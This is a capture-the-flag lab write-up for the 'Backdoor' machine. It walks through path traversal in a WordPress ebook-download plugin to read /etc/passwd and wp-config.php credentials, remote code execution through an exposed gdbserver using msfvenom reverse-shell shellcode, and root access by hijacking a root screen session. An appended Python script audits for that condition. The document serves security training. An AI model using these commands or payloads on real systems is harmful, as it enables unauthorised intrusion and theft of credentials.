Target IP: 10.129.96.68
Challenge Description: N/A.
I performed a port scan using the command sudo nmap -sS 10.129.96.68 -p- against the target machine and obtained the result shown above. By the looks of it, three TCP ports are open on the target: SSH, HTTP, and an unidentified service on port 1337. Time to gather more information about these ports with an aggressive scan.
Running an aggressive scan using the command sudo nmap -sV -A 10.129.96.68 -p 22,80,1337 against the target machine returns the result shown above (-A already implies -sV, along with OS detection, default scripts and traceroute, so the extra flag is redundant but harmless). The target machine appears to be running a WordPress web application on port 80. There is another, unusual application on port 1337.
Port 80: HTTP
The WordPress page above is displayed for this web application. Hovering over the Home button revealed the hostname backdoor.htb, which I added to my /etc/hosts file.
Using the Wappalyzer browser extension, I identified that the target is running WordPress 5.8.1, as shown above. Manual enumeration and source inspection turned up nothing useful. Since the site runs WordPress, I can use wpscan to enumerate it; in particular, I want to know which plugins are installed and who the users are.
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Backdoor]
└─$ wpscan --url http://backdoor.htb --enumerate ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://backdoor.htb/ [10.129.96.68]
[+] Started: Wed May 15 14:05:10 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://backdoor.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:11:42 <========================================> (105493 / 105493) 100.00% Time: 00:11:42
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://backdoor.htb/wp-content/plugins/akismet/
| Latest Version: 5.3.2
| Last Updated: 2024-03-21T00:55:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] ebook-download
| Location: http://backdoor.htb/wp-content/plugins/ebook-download/
| Last Updated: 2020-03-12T12:52:00.000Z
| Readme: http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
| [!] The version is out of date, the latest version is 1.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/, status: 200
|
| Version: 1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed May 15 14:17:34 2024
[+] Requests Done: 105502
[+] Cached Requests: 40
[+] Data Sent: 28.222 MB
[+] Data Received: 14.11 MB
[+] Memory used: 461.707 MB
[+] Elapsed time: 00:12:24

I ran the command wpscan --url http://backdoor.htb --enumerate ap --plugins-detection aggressive and obtained the result shown above. With the default passive plugin detection, which only looks for plugins referenced in the page source, wpscan found nothing; only --plugins-detection aggressive, which probes every known plugin path directly, turned up the two plugins: akismet, whose version could not be determined, and ebook-download 1.1, as shown above. The aggressive mode cost more than 105,000 requests and twelve minutes, so it is far from quiet. I also ran wpscan --url http://backdoor.htb --enumerate u, which identified a single user called admin. Are the plugins used by the web application vulnerable?
It looks like the plugin ebook-download 1.1 is vulnerable to directory traversal, as shown above. The vulnerability is CVE-2016-10924: filedownload.php reads whatever path is supplied in the ebookdownloadurl parameter without validating it, so any file the web server user can read can be requested. A PoC is provided alongside this verified exploit. Time to test it against the target machine.
Using the command curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd, I managed to read /etc/passwd on the target, as shown above. Note that the plugin echoes the requested path in front of the file contents, so the leading path has to be ignored when reading the output. The file shows a non-root account named user. I tried to read this user's SSH key, but had no luck. Time to search for any useful files.
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Backdoor]
└─$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/* THIS IS CUSTOM CODE CREATED AT ZEROFRACTAL TO MAKE SITE ACCESS DYNAMIC */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
<script>window.close()</script>

One interesting file is wp-config.php. I ran the command curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php and retrieved it, as shown above; the path is relative to the plugin directory, so three ../ steps land in the WordPress root. The file contains the database credentials wordpressuser:MQYBJSaD#DxG6qbm. I tried these credentials on the web application login, but had no luck, and SSH did not accept them either. The authentication keys and salts are also still the installer placeholders, a separate misconfiguration worth noting. Running ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=FUZZ -fw 1 (the -fw 1 filter drops responses consisting of a single word, which is what the plugin returns when the requested file does not exist), I noticed that files under /proc are readable. From previous experience, I know it is possible to obtain process information through an LFI. Maybe I can identify what is running on port 1337 on the target machine?
I used the command curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/sched_debug and obtained the result shown above. Among the scheduler's per-CPU task tables there is a gdbserver process with the PID 1810, as shown above. Now I can read /proc/1810/cmdline to obtain this process's full command line. Note that cmdline separates the arguments with NUL bytes, so in a terminal they run together; I downloaded the file with the web browser instead (piping the curl output through tr '\0' ' ' would work as well).
And bingo! The target machine is running gdbserver listening on port 1337, as shown above. The gdbserver version cannot be obtained this way.
I ran the command searchsploit "gdbserver" and found that it is vulnerable to remote code execution (Exploit-DB 50539, written for GNU gdbserver 9.2). This is not a memory-corruption bug: the GDB remote protocol lets any connected client write the debuggee's memory and registers and resume it, so an unauthenticated gdbserver exposed on the network is code execution by design. Using the command searchsploit -m linux/remote/50539.py, I copied the exploit to my machine.
I read the exploit's code to learn how to use it. First, I need to generate shellcode with msfvenom, then start a listener to catch the reverse shell connection. To generate the shellcode, I used the command msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=8443 PrependFork=true -o rev.bin (with no -f given, msfvenom writes the raw bytes the exploit expects). Then I started a listener on my machine on port 8443 and launched the exploit with the command python3 50539.py 10.129.96.68:1337 rev.bin.
And now I have a foothold on the target machine as the account named user, as shown above. I upgraded my shell using the command python3 -c 'import pty; pty.spawn("/bin/bash");'.
Running the command find / -perm -u=s -type f 2>/dev/null shows that the binary /usr/bin/screen has the SUID bit set, as shown above. However, GTFOBins offers no direct SUID technique for it. Maybe another screen session is running on the target machine? Or the application itself is vulnerable? I ran the command screen -v and obtained the version number 4.08.00, which is not affected by the well-known screen local privilege escalation (that was 4.5.0).
Running the command ps -auxw, I obtained the information shown above. There is a screen session being run by the user root.
I executed the command screen -ls root/ and obtained the session list above. There is a root screen session with the ID 1018.root.
To take over the higher-privileged session, I first ran the command screen -x 1018.root/. Then I executed the command TERM=screen screen -x root/1018. And bingo! Now I have a root shell on the target machine :) The user/session form attaches another user's session, which works here because the set-uid binary runs as root, and TERM has to be set explicitly because the upgraded reverse shell has no terminal type in its environment. Now I have full access over the target machine as root. GG.
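As an added example (my own code, not from the write-up), a small Python audit that encodes the two conditions this escalation relied on: a set-uid screen binary, and a screen session belonging to another user under /run/screen/S-<user>/, together with the attach command including the TERM setting. run_demo() builds a constructed directory tree inside a temporary directory rather than touching the real /run/screen; the paths /usr/bin/screen and /run/screen are assumed Ubuntu defaults.

```python
import os
import re
import socket
import stat
import tempfile

SCREEN_BIN = "/usr/bin/screen"           # assumed default location of the binary
SOCKET_ROOT = "/run/screen"              # assumed default socket directory (Ubuntu)
SESSION_NAME = re.compile(r"^\d+\.\S+$")  # <pid>.<name>, e.g. 1018.root


def describe_binary(path: str = SCREEN_BIN) -> dict:
    """Report whether `path` exists, carries the set-uid bit, and who owns it.
    The escalation needs suid=True with owner_uid 0 (root)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"exists": False, "suid": False, "owner_uid": None}
    return {
        "exists": stat.S_ISREG(st.st_mode),
        "suid": bool(st.st_mode & stat.S_ISUID),
        "owner_uid": st.st_uid,
    }


def list_sessions(socket_root: str = SOCKET_ROOT) -> list:
    """Enumerate sessions as (user, session_id, is_socket) under S-<user> directories.
    A directory this process cannot read is reported as (user, None, False); that is
    exactly the case where 'screen -ls <user>/' through the set-uid binary still can."""
    found = []
    try:
        entries = sorted(os.listdir(socket_root))
    except OSError:
        return found
    for entry in entries:
        if not entry.startswith("S-"):
            continue
        user, userdir = entry[2:], os.path.join(socket_root, entry)
        try:
            names = sorted(os.listdir(userdir))
        except PermissionError:
            found.append((user, None, False))
            continue
        for name in names:
            if SESSION_NAME.match(name):
                st = os.lstat(os.path.join(userdir, name))
                found.append((user, name, stat.S_ISSOCK(st.st_mode)))
    return found


def attach_command(user: str, session: str) -> list:
    """argv that attaches another user's session; screen refuses without a TERM."""
    return ["env", "TERM=screen", "screen", "-x", "%s/%s" % (user, session)]


def run_demo() -> dict:
    """Audit a constructed tree in a temp dir (never the real /run/screen)."""
    with tempfile.TemporaryDirectory() as base:
        fake_screen = os.path.join(base, "screen")
        with open(fake_screen, "wb") as fh:
            fh.write(b"#!/bin/sh\n")
        os.chmod(fake_screen, 0o4755)                # set-uid bit, as on the box
        rootdir = os.path.join(base, "S-root")
        os.makedirs(rootdir)
        s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        s.bind(os.path.join(rootdir, "1018.root"))   # real sessions are unix sockets
        s.close()
        os.makedirs(os.path.join(base, "S-user"))    # a user with no sessions
        return {"binary": describe_binary(fake_screen), "sessions": list_sessions(base)}


if __name__ == "__main__":
    print(describe_binary())
    for user, session, is_sock in list_sessions():
        if session is None:
            print("S-%s unreadable; try: screen -ls %s/" % (user, user))
        else:
            print(user, session, "socket" if is_sock else "not a socket",
                  " ".join(attach_command(user, session)))
```

Run against the live box the S-root directory is normally unreadable to user, which is precisely why the write-up went through screen -ls root/ and screen -x root/1018: the set-uid binary does the directory access as root.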
The two flags are shown above.